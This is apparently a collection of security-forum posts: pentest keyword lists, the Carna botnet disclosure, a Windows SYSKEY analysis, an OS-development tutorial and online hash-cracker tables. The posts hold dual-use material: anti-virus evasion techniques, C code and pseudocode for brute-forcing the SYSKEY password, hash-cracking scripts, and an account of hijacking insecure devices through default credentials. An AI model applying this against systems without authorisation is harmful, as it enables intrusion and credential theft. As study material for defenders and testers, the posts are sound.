Password and hash dumping: Cain, lsa secrets, credential manager, fgdump, mimikatz, MetaSploit post modules
Password hash cracking: john the ripper, hashcat, lophtcrack, masking, Cain
Impersonating users: incognito, mimikatz, pass the hash, MetaSploit psexec, shared accounts, smbexec

Linux Penetration and Escalation
Even though Linux and UNIX systems aren’t in the majority on most networks, they still have a role to play and so, naturally, it’s good to understand their soft spots as well. For the most part, Linux has many of the same basic keywords and vulnerability categories as Windows:

Default passwords
Clear text passwords
Excessive privileges: Users, services, gui, files, memory, setuid, orphan files, world writable files, sudoers configurations
Insecure local and remote services
Insecure scheduled tasks
Local and remote exploits
Password guessing: medusa, hydra, bruter, and MetaSploit
Password and hash dumping
Password hash cracking: john the ripper, hashcat, masking

Man in the Middle (MITM) Attacks
For some of you, MITM attacks may be a new concept, so here is a brief description. If a workstation is communicating with a server, and you are routing traffic between them, then you are the MITM. It’s a great position to be in for monitoring and manipulating traffic. There are lots of ways to acquire a MITM position using a range of protocol attacks. To get you started, I’ve provided a list of 10 protocols and tools for attacking systems on a LAN.

Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds
NetBIOS Name Service (NBNS): MetaSploit and responder
Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder
Pre-Execution Environment (PXE): MetaSploit
Dynamic Trunking Protocol (DTP): Yersinia
Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin)
Hot Stand-by Router Protocol (HSRP): Yersinia
Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup
Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack
VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig

Anti-Virus Evasion
Anti-virus evasion is often a requirement during penetration testing. I personally break down AV evasion approaches into the four buckets below. I provided a list of keywords for each category to get your searches started. I’m also planning to release a few blogs down the line that will provide more options and actual examples.

Bypass Weak AV Configurations
Uninstall anti-virus, disable services, terminate processes, disable via the GUI, create an exception policy for all .exe files, or execute from external media.

Source Code Manipulation
Remove comments, randomize function and variable names, encode or encrypt content, delay execution of malicious code, use alternative functions, or insert superfluous functions that change execution flow.

Binary Manipulation
Bind with whitelisted applications, pack or compress, modify strings, modify resources, modify the imports table, modify assembly to do the things mentioned under source code manipulation. Common packers: upx, iexpress, and mpress.

Process Manipulation
Inject malicious code or DLLs into local or remote processes. Native languages can do it directly or through a managed code framework like .net. Powershell is a popular example that the MetaSploit team (amongst others) has been using a lot lately. Also, process manipulation is commonly done with python code that is converted to a portable executable.

Sursa: Resources for Aspiring Penetration Testers | NetSPI Blog
-
These guys say a lot, but in another topic on the same subject.
-
Port scanning /0 using insecure embedded devices
From: "internet census" <internetcensus2012 () mail com>
Date: Sun, 17 Mar 2013 19:54:03 -0400

--------------------- Internet Census 2012 ---------------------
-------- Port scanning /0 using insecure embedded devices --------
------------------------- Carna Botnet -------------------------

While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials.

From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.

All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent.

The dataset contains:
- 52 billion ICMP ping probes
- 10.5 billion reverse DNS records
- 180 billion service probe records
- 2.8 billion SYN scan records for 660 million IPs with 71 billion ports tested
- 80 million TCP/IP fingerprints
- 75 million IP ID sequence records
- 68 million traceroute records

This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible. A full documentation, including statistics and images, can be found on the project page.

We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world.

No devices were harmed during this experiment and our botnet has now ceased its activity.

Project Page: Internet Census 2012
http://internetcensus2012.github.com/InternetCensus2012/

Internet Census 2012 Torrent MAGNET LINK:
magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fe&dn=InternetCensus2012&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce

Sursa: Full Disclosure: Port scanning /0 using insecure embedded devices
-
[h=1]Password Algorithms: Windows System Key (SYSKEY)[/h]
I stumbled upon some forum posts related to System Key recently and read something about one of the authentication modes available to Administrators that made me wonder if it was true or not. Just to note, there are 3 modes:

1. Generated by passphrase
2. Stored in registry
3. Stored on removable storage device

2 is enabled by default, but you can change this with the syskey.exe utility. The claim was that if you forgot the passphrase or “startup password” there’s no reliable method of recovery. The “only way” to get back into the system is to restore a backup if one is available or disable it completely using something like ntpasswd.

In most cases, either way is probably sufficient enough, but there are situations where you would need to know the original passphrase and don’t have a backup available, or perhaps you can’t even use a backup, which could erase some critical information required. There are a number of ways to recover the passphrase but I’ll just suggest one for now.

I found this short video which shows someone enabling the startup password. One of the comments is “BOSS? HOW WE HACK SYSKEY!!!”

[h=2]History of SYSKEY[/h]
SYSKEY was Microsoft’s response to pwdump and L0phtCrack. It was provided as an optional security enhancement with Windows NT SP3 and enabled by default since the release of Windows 2000. The purpose of this feature was to prevent pwdump working without modifications. Open source offline decryption tools didn’t surface until the release of samdump2 by Nicola Cuomo. What follows is a short timeline of events related to SYSKEY.

[TABLE]
[TR] [TD]March 1997[/TD] [TD]Samba developer Jeremy Allison publishes pwdump which enables Administrators to dump LM and NTLM hashes stored in the SAM database.[/TD] [/TR]
[TR] [TD]April 1997[/TD] [TD]L0pht publishes L0phtcrack which allows Administrators to audit password hashes. It had been in development since the release of pwdump.[/TD] [/TR]
[TR] [TD]May 1997[/TD] [TD]Microsoft publishes Service Pack 3 for Windows NT which added SYSKEY as an optional feature to prevent pwdump working properly.[/TD] [/TR]
[TR] [TD]December 1999[/TD] [TD]Todd Sabin documents a flaw with SYSKEY. Anyone with access to the SAM database can reveal password hashes without the System key.[/TD] [/TR]
[TR] [TD]April 2000[/TD] [TD]Todd Sabin releases pwdump2 which dumps password hashes with the obfuscation removed. This also dumps hashes from a domain controller.[/TD] [/TR]
[TR] [TD]February 2004[/TD] [TD]Nicola Cuomo documents SYSKEY and releases Samdump2 which enables offline decryption of password hashes stored in the SAM database.[/TD] [/TR]
[/TABLE]

[h=2]Password Generation[/h]
When the system boots and auth mode 1 is enabled, Windows will display a dialog box waiting for you to enter the password. The following text is displayed on an XP system.

“This computer is configured to require a password in order to start up. Please enter the Startup Password below.”

Blank passwords are acceptable, so whether you enter something or not, it gets processed with MD5 and authenticated once you hit OK.

[CODE]
#include <stdint.h>
#include <wchar.h>
#include <openssl/md5.h>

#define MAX_SYSKEY_PWD 260

/* Turn the startup password into the 16-byte System Key:
   MD5 over the password, truncated to MAX_SYSKEY_PWD characters. */
void pwd2key(wchar_t pwd[], uint8_t syskey[])
{
    MD5_CTX ctx;
    size_t  pwd_len = wcslen(pwd);

    pwd_len = (pwd_len > MAX_SYSKEY_PWD) ? MAX_SYSKEY_PWD : pwd_len;

    MD5_Init(&ctx);
    MD5_Update(&ctx, pwd, pwd_len);
    MD5_Final(syskey, &ctx);
}
[/CODE]

Enter the wrong password 3 times and you’ll receive the following error.

“System error: Lsass.exe”
“When trying to update a password the return status indicates that the value provided as the current password is not correct.”

This message appears because the LSA database key fails to decrypt, but I wanted to know how exactly this password was authenticated. Between XP and Vista, the LSA database got a major upgrade so you may see something else on post-XP systems. If you were to attempt recovery through the LSA database, it would not only be much slower, it’s more complicated, and because there’s a simpler way, I’m not going to cover it.

[h=2]SAM Database[/h]
The SAM database is stored in %SystemRoot%\System32\config\SAM which, as you probably know, contains local user and group information, including encrypted NTLM/LM hashes. Windows reads the value of F under SAM\Domains\Account and, using the System key, decrypts the Sam key. The structure of the F value isn’t documented but I’ve put together what I *think* is close enough to the original based on some MSDN documentation and analyzing code in SAMSRV.DLL, which is where the decryption occurs.

[CODE]
#include <stdint.h>
#include <string.h>
#include <openssl/md5.h>
#include <openssl/rc4.h>

/* NTSTATUS codes as defined in the Windows SDK (ntstatus.h) */
typedef long NTSTATUS;
#define STATUS_SUCCESS        ((NTSTATUS)0x00000000L)
#define STATUS_WRONG_PASSWORD ((NTSTATUS)0xC000006AL)

#define MD5_DIGEST_LEN   MD5_DIGEST_LENGTH
#define SYSTEM_KEY_LEN   16
#define QWERTY "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"
#define DIGITS "0123456789012345678901234567890123456789"

#define SAM_KEY_LEN      16
#define SAM_SALT_LEN     16
#define SAM_CHECKSUM_LEN 16

/* Encrypted Sam key material embedded in the F value */
typedef struct _SAM_KEY_DATA {
    uint32_t Revision;
    uint32_t Length;
    uint8_t  Salt[SAM_SALT_LEN];
    uint8_t  Key[SAM_KEY_LEN];            /* RC4-encrypted Sam key */
    uint8_t  CheckSum[SAM_CHECKSUM_LEN];  /* RC4-encrypted checksum, follows Key */
    uint32_t Reserved[2];
} SAM_KEY_DATA, *PSAM_KEY_DATA;

typedef enum _DOMAIN_SERVER_ENABLE_STATE {
    DomainServerEnabled = 1,
    DomainServerDisabled
} DOMAIN_SERVER_ENABLE_STATE, *PDOMAIN_SERVER_ENABLE_STATE;

typedef enum _DOMAIN_SERVER_ROLE {
    DomainServerRoleBackup  = 2,
    DomainServerRolePrimary = 3
} DOMAIN_SERVER_ROLE, *PDOMAIN_SERVER_ROLE;

typedef struct _OLD_LARGE_INTEGER {
    unsigned long LowPart;
    long          HighPart;
} OLD_LARGE_INTEGER, *POLD_LARGE_INTEGER;

#pragma pack(4)
/* Reconstructed layout of the F value under SAM\Domains\Account */
typedef struct _DOMAIN_ACCOUNT_F {
    uint32_t          Revision;
    uint32_t          unknown1;
    OLD_LARGE_INTEGER CreationTime;
    OLD_LARGE_INTEGER DomainModifiedCount;
    OLD_LARGE_INTEGER MaxPasswordAge;
    OLD_LARGE_INTEGER MinPasswordAge;
    OLD_LARGE_INTEGER ForceLogoff;
    OLD_LARGE_INTEGER LockoutDuration;
    OLD_LARGE_INTEGER LockoutObservationWindow;
    OLD_LARGE_INTEGER ModifiedCountAtLastPromotion;
    uint32_t          NextRid;
    uint32_t          PasswordProperties;
    uint16_t          MinPasswordLength;
    uint16_t          PasswordHistoryLength;
    uint16_t          LockoutThreshold;
    uint16_t          unknown2;
    DOMAIN_SERVER_ENABLE_STATE ServerState;
    DOMAIN_SERVER_ROLE         ServerRole;
    uint8_t           UasCompatibilityRequired;
    uint32_t          unknown3[2];
    SAM_KEY_DATA      keys[2];
    uint32_t          unknown4;
} DOMAIN_ACCOUNT_F, *PDOMAIN_ACCOUNT_F;
#pragma pack()

NTSTATUS DecryptSamKey(PSAM_KEY_DATA key_data, uint8_t syskey[])
{
    MD5_CTX ctx;
    RC4_KEY key;
    uint8_t dgst[MD5_DIGEST_LEN];

    // create key with salt and decrypt data (Key and CheckSum are contiguous)
    MD5_Init(&ctx);
    MD5_Update(&ctx, key_data->Salt, SAM_SALT_LEN);
    MD5_Update(&ctx, QWERTY, strlen(QWERTY) + 1);
    MD5_Update(&ctx, syskey, SYSTEM_KEY_LEN);
    MD5_Update(&ctx, DIGITS, strlen(DIGITS) + 1);
    MD5_Final(dgst, &ctx);

    RC4_set_key(&key, MD5_DIGEST_LEN, dgst);
    RC4(&key, SAM_CHECKSUM_LEN + SAM_KEY_LEN, key_data->Key, key_data->Key);

    // verify decryption was successful by generating checksum
    MD5_Init(&ctx);
    MD5_Update(&ctx, key_data->Key, SAM_KEY_LEN);
    MD5_Update(&ctx, DIGITS, strlen(DIGITS) + 1);
    MD5_Update(&ctx, key_data->Key, SAM_KEY_LEN);
    MD5_Update(&ctx, QWERTY, strlen(QWERTY) + 1);
    MD5_Final(dgst, &ctx);

    // compare with checksum and return status
    if (memcmp(dgst, key_data->CheckSum, SAM_CHECKSUM_LEN) == 0) {
        return STATUS_SUCCESS;
    }
    return STATUS_WRONG_PASSWORD;
}
[/CODE]

NOTE: The strings didn’t format well for the blog but if you plan on using them, let me know.

As you can see above, the Sam key is decrypted using the System key and then a checksum is generated and compared with the one stored in SAM_KEY_DATA. If they match, authentication succeeded and STATUS_SUCCESS is returned, else STATUS_WRONG_PASSWORD. That’s pretty much how you can brute force the System Key when auth mode 1 is selected.

[h=2]Recovery[/h]
Assuming you can read the F value from the SAM hive, recovery is straightforward enough with the right libraries/code. The following is just some pseudo code to demonstrate the flow of recovery using a dictionary attack.

[CODE]
sam = openfile("offline_system\Windows\config\SAM");
data = readreg(sam, "SAM\Domains\Account", "F")
words = openfile("dictionary.txt")

while (readfile(words, pwd)) {
    pwd2key(pwd, syskey)
    if (DecryptSamKey(data->keys[0], syskey) == STATUS_SUCCESS) {
        print "Found password: " + pwd
        break;
    }
}
closefile(words)
closefile(sam)
[/CODE]

The LSA and NTDS algorithms call a hash function 1000 times during creation of the encryption/decryption key, while the SAM algorithm doesn’t use any. It’s not a vulnerability but could be useful to know some day.

Sursa: Password Algorithms: Windows System Key (SYSKEY) | Insecurety Research
-
[h=1]Simple Os Example[/h]
Posted 18 May 2007 - 05:11 PM

Simple OS Example - by Napalm and Xavier

Want to make your own Operating System? After reading Topic #24940 I thought it would be a good idea to share some knowledge I've gained about operating system development. So Xavier and I decided to write a simple operating system to help people get started in OS development. This project is aimed at operating system development under Windows, but should be compatible with Linux users.

First a small explanation of how an IBM compatible PC boots. The first stop is the BIOS, which loads the bootable medium as per your BIOS configuration i.e. floppy, cdrom, hdd, etc. In our example we have chosen the simplest of these, a floppy. The BIOS copies and loads the boot sector of the media and this in turn passes control to the boot-loader (GRUB, LILO, NTLDR). You can create your own boot-loader, but at such a low level it's not for the faint hearted. There are plenty of good boot-loaders already created, so we have decided to go with one of our favourites, GRUB.

The boot-loader as per its configuration will load the kernel of our OS. With GRUB this is done with menu.lst which is pre-configured in our base.img file. GRUB moves the system into protected mode and sets up the A20 gate (Google for details). GRUB has a boot specification which is helpful to us, Multi-boot. We have applied the multi-boot scheme in our boot.asm, this is also the entry point of the operating system (this is where our program first gains control). In boot.asm we declare an uninitialised 8KB data block for our kernel stack, and then we further pass control onto our C code.

One of the more difficult aspects of OS development is that you have no library functions to build on (this means no strlen, strcpy or even memset). So without any functions to output, input or even process information we start at a road-block (kind of like being hurled into the ocean with no life raft).

After all that has been said, we do have direct access to the hardware. So outputting to the screen should not be too difficult. The BIOS sets up a mapped area of physical memory to the VGA adapter installed in the machine. By default, this area starts at 0xB8000. So with the simple line of C below we could output a character to the screen. The upper 8 bits of 0x0F00 are the char attributes of background black (0x0) and foreground (0xF).

[CODE]
*(unsigned short *)0xB8000 = 0x0F00 | 'A';
[/CODE]

In 'screen.c' you will find basic functions to output text to the screen. We also have some I/O ports provided to us to control the VGA adapter. The two ports we are interested in are the index and data registers for the CRT interface. These will allow us to control the old style blinking console cursor. You will see these registers in use in the updatecursor(), hidecursor() and showcursor() functions inside 'screen.c'. For more information regarding the VGA interface see the following link: http://www.osdever.n...VGA/vga/vga.htm

It might not seem like it, but the most important part of OS Dev'ing is the Development Environment itself. Having a good set of utilities to develop and test with is one of the most important parts. So below is a list of requirements and where to get them. This should help even the most n00bish person get started. Our environment is set up for use under Windows (2k or above) but any competent Linux user should be able to make the minor alterations necessary to build this project under Linux. The assembler we are using in the project is my favourite, NASM, and a port of the GNU GCC compiler. These are provided under a simulated Linux environment called DJGPP. All links are provided to get all the requirements listed below.

List of Requirements:
Windows (duh!)
DJGPP (Provided)
NASM (Included in DJGPP package)
VMWare Player (Optional) VMware Player: Run Windows 8, Chrome OS on a Virtual PC
Brain (IBM compatible only!)

Setting up DJGPP:
Extract http://www.blackcore...urces/djgpp.zip to C:\DJGPP. Alternatively if you feel ultra confident (or bored) you can manually acquire each individual package yourself, from a mirror located on DJGPP. The packages you require are: bnu217b.zip, djdev203.zip, gcc344b.zip, mak380b.zip and a compatible version of NASM can be found here: http://downloads.sou...98.39-djgpp.zip

Building The Kernel:
Now that DJGPP has been set up you can extract the attached zip file to any location you please. Once extracted you'll find several batch files. Execute 'build.bat' to compile the kernel binary (kernel.bin). Now that you have a kernel you will need to make this bootable. This can be done via 'mkfloppy.bat' or 'mkcdrom.bat' to make a bootable floppy or cdrom image respectively. At any point after you have built the kernel you can execute 'test.bat' to launch the kernel in VMWare. Below you will find a screenshot that has been captured from VMWare.

We hope this will encourage more programmers to delve into the wonderful (and frustrating) world of OS development. Linux users are encouraged to post instructions on how to modify the project to build under a Linux environment.

Any and all comments are welcome,
Napalm and Xavier

Bootnotes
I deleted the whole project by accident during a send to Xavier and I had to rewrite the entire thing. A note about batch files: although they are extremely useful they are also a massive pain in the ass. We spent about an hour getting the 'mkcdrom.bat' script working, so be thankful.

Update - 1st June 2008
I've updated the attached archive to include compiled images for floppy and cd-rom. I've also updated it to use the new KernelCopy application mentioned further on in this topic. I've hacked the download count to match the previous download count before the update.

Update - 16th June 2008
I was notified that my last update broke the base image file included. I was an idiot and defragged the image so the upload would compress smaller. I forgot that when grub installs itself it tells stage1 which sector stage2 is located in. Therefore when the defrag moved stage2 it broke the boot loader and the image stopped working. I've updated the attachment with a completely new grub bootable base image file (it compresses even smaller now to 65Kb).

Update - 27th November 2008
I've made some minor alterations to help the confused people get their heads around the source. If you want me to write a completely updated version with more support please post a reply and say so. I've updated the attachment.

[h=4]Attached Files[/h]
simpleos.zip 647.44K 3175 downloads

Sursa: Simple Os Example - rohitab.com - Forums
-
[h=3]Online Hash Crackers[/h]

The "Hashes" column is the size of each service's lookup database, where it is published ("?" where it is not).

[TABLE]
[TR] [TH]MD5[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]Tobtu[/TD] [TD]50,529,455,839[/TD] [/TR]
[TR] [TD]TMTO[/TD] [TD]36,436,233,567[/TD] [/TR]
[TR] [TD]MD5Decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR]
[TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR]
[TR] [TD]AuthSecu[/TD] [TD]500,000,000[/TD] [/TR]
[TR] [TD]Gat3way[/TD] [TD]458,000,000[/TD] [/TR]
[TR] [TD]MD5this[/TD] [TD]400,000,000[/TD] [/TR]
[TR] [TD]NetMD5crack[/TD] [TD]171,392,210[/TD] [/TR]
[TR] [TD]Kalkulators[/TD] [TD]100,000,000[/TD] [/TR]
[TR] [TD]Rednoize[/TD] [TD]76,834,449[/TD] [/TR]
[TR] [TD]Gromweb[/TD] [TD]45,543,530[/TD] [/TR]
[TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR]
[TR] [TD]Crackfoo -NNC[/TD] [TD]38,227,555[/TD] [/TR]
[TR] [TD]MD5Rainbow[/TD] [TD]33,517,066[/TD] [/TR]
[TR] [TD]Digitalsun[/TD] [TD]31,000,000[/TD] [/TR]
[TR] [TD]Hashcrack[/TD] [TD]30,654,899[/TD] [/TR]
[TR] [TD]Sans[/TD] [TD]20,264,963[/TD] [/TR]
[TR] [TD]Crackfor.me[/TD] [TD]16,173,854[/TD] [/TR]
[TR] [TD]MD5-lookup[/TD] [TD]8,796,772[/TD] [/TR]
[TR] [TD]MD5decrypter[/TD] [TD]8,103,123[/TD] [/TR]
[TR] [TD]MD5-db[/TD] [TD]5,500,000[/TD] [/TR]
[TR] [TD]MD5-decrypter[/TD] [TD]3,400,000[/TD] [/TR]
[TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR]
[TR] [TD]Shalla[/TD] [TD]2,218,319[/TD] [/TR]
[TR] [TD]Hash-Database[/TD] [TD]1,635,062[/TD] [/TR]
[TR] [TD]MD5decryption[/TD] [TD]1,300,000[/TD] [/TR]
[TR] [TD]agilobable.pl[/TD] [TD]1,131,017[/TD] [/TR]
[TR] [TD]Drasen[/TD] [TD]568,064[/TD] [/TR]
[TR] [TD]MD5finder[/TD] [TD]429,477[/TD] [/TR]
[TR] [TD]MD5pass[/TD] [TD]327,497[/TD] [/TR]
[TR] [TD]Bokehman[/TD] [TD]230,000[/TD] [/TR]
[TR] [TD]Shell-Storm[/TD] [TD]154,994[/TD] [/TR]
[TR] [TD]Xanadrel[/TD] [TD]104,209[/TD] [/TR]
[TR] [TD]Joomlaaa[/TD] [TD]23,469[/TD] [/TR]
[TR] [TD]Appspot[/TD] [TD]Multi[/TD] [/TR]
[TR] [TD]Noisette[/TD] [TD]Multi[/TD] [/TR]
[TR] [TD]MD5crack[/TD] [TD]Multi[/TD] [/TR]
[TR] [TD]Kinginfet[/TD] [TD]Multi[/TD] [/TR]
[TR] [TD]Benramsey[/TD] [TD]Multi[/TD] [/TR]
[TR] [TD]VHCTeam[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Hack-Shop[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Longgie[/TD] [TD]?[/TD] [/TR]
[TR] [TD]RAH-Labs[/TD] [TD]?[/TD] [/TR]
[TR] [TD]rusuh.us[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Wordd[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Anqel[/TD] [TD]?[/TD] [/TR]
[TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR]
[TR] [TD]web-security-services[/TD] [TD]?[/TD] [/TR]
[TR] [TD]MD5online[/TD] [TD]?[/TD] [/TR]
[TR] [TD]MD5.my-addr[/TD] [TD]?[/TD] [/TR]
[TR] [TD]C0llision[/TD] [TD]?[/TD] [/TR]
[TR] [TD]MD5hood[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Schwett[/TD] [TD]?[/TD] [/TR]
[TR] [TD]TheKaine[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Generuj[/TD] [TD]?[/TD] [/TR]
[/TABLE]

[TABLE]
[TR] [TH]NTLM[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]MD5decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR]
[TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR]
[TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR]
[TR] [TD]HashCrack[/TD] [TD]30,654,909[/TD] [/TR]
[TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR]
[TR] [TD]LMCrack[/TD] [TD]?[/TD] [/TR]
[TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR]
[/TABLE]

[TABLE]
[TR] [TH]LM[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR]
[TR] [TD]HashCrack[/TD] [TD]30,654,911[/TD] [/TR]
[TR] [TD]NiceNameCrew[/TD] [TD]?[/TD] [/TR]
[TR] [TD]C0llision[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Fox21[/TD] [TD]?[/TD] [/TR]
[/TABLE]

[TABLE]
[TR] [TH]SHA1[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]MD5Decrypter(uk)[/TD] [TD]8,700,000,000[/TD] [/TR]
[TR] [TD]Rednoize[/TD] [TD]76,838,852[/TD] [/TR]
[TR] [TD]hash-cracker.com[/TD] [TD]40,000,000[/TD] [/TR]
[TR] [TD]Sans[/TD] [TD]20,264,963[/TD] [/TR]
[TR] [TD]SHA1-Lookup[/TD] [TD]18,949,380[/TD] [/TR]
[TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR]
[TR] [TD]Hash-Database[/TD] [TD]1,635,065[/TD] [/TR]
[TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR]
[TR] [TD]StringFunction[/TD] [TD]?[/TD] [/TR]
[TR] [TD]Web-Security-Services[/TD] [TD]?[/TD] [/TR]
[/TABLE]

[TABLE]
[TR] [TH]SHA256-512[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]Hash-Database[/TD] [TD]1,635,067[/TD] [/TR]
[TR] [TD]Shalla[/TD] [TD]1,143,472[/TD] [/TR]
[/TABLE]

[TABLE]
[TR] [TH]MySQL[/TH] [/TR]
[TR] [TH]Cracker[/TH] [TH]Hashes[/TH] [/TR]
[TR] [TD]OnlineHashCrack[/TD] [TD]5,211,644,250[/TD] [/TR]
[TR] [TD]Hashcrack[/TD] [TD]30,654,899[/TD] [/TR]
[TR] [TD]HashCracking.ru[/TD] [TD]3,585,150[/TD] [/TR]
[TR] [TD]CMD5[/TD] [TD]?[/TD] [/TR]
[/TABLE]

Source: Password Cracker | MD5 Cracker | Wordlist Download: Online Hash Crackers
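The tables above are organised by hash type, so the first job is working out which table a bare hash string belongs to, and the second is trying a cheap local lookup before handing the hash to a third party (every hash you paste into an online cracker is disclosed to whoever runs it). The following is an added example written for this page, not code from the linked site: it classifies a hash by length and alphabet, flags the LM "empty half" constant that gives away a short password, and builds a small local lookup table over a wordlist. The wordlist and target hashes are constructed for the demo; NTLM and LM are identified but not computed, since hashlib does not ship MD4 or DES on every platform.

```python
"""Hash-type triage and local lookup before using an online cracker.
Added example for this page; sample inputs below are constructed."""
import hashlib
import re

EMPTY_LM_HALF = "aad3b435b51404ee"   # LM hash of an empty (padded) 7-byte half


def mysql41(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(pw)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def identify_hash(h: str) -> list:
    """Return the table headings (as used above) a hash string could belong to.

    Length and alphabet alone cannot separate MD5 from NTLM or LM, so all
    three are returned for a 32-hex-digit value, unless the second half is
    the LM empty-half constant, in which case it is an LM hash of a password
    of at most 7 characters and only the first half needs cracking.
    """
    h = h.strip()
    if re.fullmatch(r"\*[0-9A-Fa-f]{40}", h):
        return ["MySQL"]                       # 4.1+ format with the star
    if not re.fullmatch(r"[0-9A-Fa-f]+", h):
        return []                              # not a hex digest at all
    by_len = {16: ["MySQL"],                   # pre-4.1 16-digit format
              40: ["SHA1", "MySQL"],           # 4.1+ with the '*' dropped
              64: ["SHA256-512"],
              128: ["SHA256-512"]}
    if len(h) == 32:
        if h.lower()[16:] == EMPTY_LM_HALF:
            return ["LM"]
        return ["MD5", "NTLM", "LM"]
    return by_len.get(len(h), [])


def build_lookup(words) -> dict:
    """Hash each candidate word under every algorithm from the tables that
    hashlib provides. Returns {digest: (table, word)}."""
    table = {}
    for w in words:
        b = w.encode("utf-8")
        table[hashlib.md5(b).hexdigest()] = ("MD5", w)
        table[hashlib.sha1(b).hexdigest()] = ("SHA1", w)
        table[hashlib.sha256(b).hexdigest()] = ("SHA256-512", w)
        table[hashlib.sha512(b).hexdigest()] = ("SHA256-512", w)
        table[mysql41(w)] = ("MySQL", w)
    return table


def lookup(h: str, table: dict):
    """Case-insensitive local lookup. None means 'now try the online tables'."""
    h = h.strip()
    if h.startswith("*"):
        return table.get("*" + h[1:].upper())
    return table.get(h.lower())


if __name__ == "__main__":
    # Constructed wordlist and targets for the demo (not real leaked data).
    words = ["password", "letmein", "P@ssw0rd"]
    table = build_lookup(words)
    targets = [hashlib.md5(b"letmein").hexdigest().upper(),
               mysql41("P@ssw0rd"),
               "aad3b435b51404eeaad3b435b51404ee",
               "0" * 40]
    for t in targets:
        print(t, identify_hash(t), lookup(t, table))
```

Only hashes that survive the local step need to go to one of the services above, and for LM a hit on the second half tells you to submit just the first 16 digits.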
-
Romania, te iubesc! - Hackerville [Full Episode]
Nytro replied to Silviu's topic in Stiri securitate (Security News)
Overall, the video is pretty decent, and it is funny too; there were many moments that made me laugh. Granted, in places it is a bit far-fetched and exaggerated, and sometimes the journalists' conclusions are crap, but on the whole it sheds light on the "Hackersville" case and draws the distinction between a thief and a hacker. I just hope this documentary gets seen by as many journalists as possible; if the journalists understand the "phenomenon", everyone will.

As for the subjects, nobody did anything special. NASA says that in one year it was "hacked" at least 13 times, and on zone-h you can find 11 defacements from 2012:
- NASA says it was hacked 13 times last year | Reuters
- http://zone-h.org/archive/filter=1/fulltext=1/domain=nasa.gov

In other words, those who "hacked NASA" did nothing special and are not the only ones who did it. As for eBay, we all know how things worked, and just as being able to steal a car does not make you an automotive engineer, being able to steal the data of some losers does not make you a hacker. Tinkode got media coverage because at the time there was a fuss over every hacked site; nowadays, since big sites get hacked every day, it has lost its charm and hacking sites no longer gets the coverage it used to. So I advise you to drop the nonsense and try to become stars some other way, because yes, you can become stars doing the same thing, but you can also get the problems that come with it.

Well, the line about "the most wanted hacker on the planet" was a bit of a stretch... Overall it is fine; you can recommend it to the losers who ask you how to crack a Messenger password. They should also have spent 20 seconds covering "Knowing how to install Windows and Adobe Reader does not make you a hacker", because there are many such posers who overrate themselves.
-
[h=2]Trend Micro Warns of Attacks Against ICS/SCADA Systems[/h] March 17th, 2013, Mourad Ben Lakhoua

